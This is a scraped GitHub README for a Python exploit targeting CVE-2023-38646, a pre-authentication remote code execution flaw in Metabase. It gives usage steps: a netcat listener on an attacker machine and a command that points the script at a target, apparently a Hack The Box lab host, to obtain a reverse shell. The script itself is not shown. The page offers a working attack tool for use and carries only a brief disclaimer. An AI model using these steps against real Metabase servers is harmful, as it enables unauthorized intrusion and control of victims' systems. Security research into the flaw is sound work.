asepsaepdin / CVE-2023-38646

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-38646 - Metabase Pre-Auth RCE


⚠️ For educational and authorized security research purposes only

Original Exploit Authors

Very grateful to the original PoC author securezeron

Step Guides

  1. Set Up the Listener on your attacker machine:

    nc -nlvp 4444
  2. Then, run this command:

    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444

    image

Credits

About


Languages

Language:Python 100.0%